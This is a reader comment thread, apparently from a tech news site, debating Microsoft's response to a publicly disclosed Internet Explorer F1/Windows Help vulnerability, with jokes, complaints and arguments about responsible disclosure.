Exsqueeze me!?

MS have the nerve to take a pop at security researchers?! How about you tell the marketing people to get stuffed and spend more time fixing your shonky o/s eh? Cannot even press f1 for help without os getting stuffed now? For flips sake!

simple fix

Switch the F1 with the F2 key on your user's keyboards, with the way our users peck at their keyboards they wont notice anything odd.

This title has been required

>Microsoft gave no indication of when a patch might become available but the next scheduled Patch Tuesday is only six days away, cutting it very fine to develop, much less test, a fix. An April or even May update for IE seems more likely.

Glad to see you take security so seriously, Microsoft. Maybe next time, the hackers will wait until your calendar meshes nicer with theirs

The exploit itself

The exploit itself affects how the winhlp32.exe is compiled. it is a stack buffer overflow which uses IE 6 to 8, and a malicious VBscript on the server-side.

Changing the key pressed to initiate the help file will not change how the help file program was compiled, as it is not triggered upon the key pressed, but it is triggered upon the launch of the HELP file specifically.... whilst a msgbox is displayed.

Simple advice: teach users to phone IT support when they see a message that looks suspicious!

Exploit release timeline

===[ DISCLOSURE TIMELINE ]==============================================

01 Feb 2007 The vulnerability was discovered.

26 Feb 2010 Public disclosure.

This exploit must be at least 3 years old!

The reserchers are wrong

Whatever your opinion of MS (The Original Steve makes a good point) these researcehers are wrong to release an exploit like this without notifying the vender. MS have a very efficient deparment when it comes to receiving this kind of information unlike Apple who just refuse to even have a process in place (as far as i'm aware). Fair enough tell MS that you'll give them a week to work on a fix then you'll release it but to just release it exposes allot of peole to risk untill a fix can be produced. This might not be a small task that can be fixed in a short space of time.

Conspiracy theory

That's not a bug, that's a feature in the form of an incentive for users to upgrade from 2000/XP to Vista/7.

But honestly...

How much use does the F1 key really get from the common user, you know, with the actual word "Help" put nicely in the title bar? Joe Shmo can hardly figure out how to copy and paste using the keyboard, let alone venture into the function of the Function keys. Now if it were F5, I'd be livid.

Paris, because if anyone, she needs F1.

Bad publicity = good

Of course MS say the researchers should have gone to them first - it keeps the lid on yet another idiot blunder on Microsofts part. Sure it would have come out eventually, but it wont be as big a news story if they already sorted it - the worse the press MS get on all their poor software engineering, the better.

Fact is the web exploits instructing people to press F1 are already in place, they were zero-day at the time, and the issue isn't likely to be made much worse by its going public, because now at least some people know not to hit F1. Generally, in the past, public knowledge of a vulnerability has NOT resulted in more websites attempting the same exploit (that is unless Microsoft or whoever fail to update their software promptly) because there are a hell of a lot more zero-day vulns available in the hacker community to work with.

.

@Bruno Girin & The Original Steve - Yes people should upgrade, but there are still vulnerabilities discovered in Vista and 7 all the time, what about that ridiculous 17 year old VDM bug that was still present in all 32bit Windows OSes?

This one, to my knowledge is one of a minority of bugs which only affect OSes prior to Vista.

This is a Microsoft conspiracy

to get you to use a different browser - a few days after their IE option screen for other browsers - coincidence, I don't think so. Wait...what am I saying?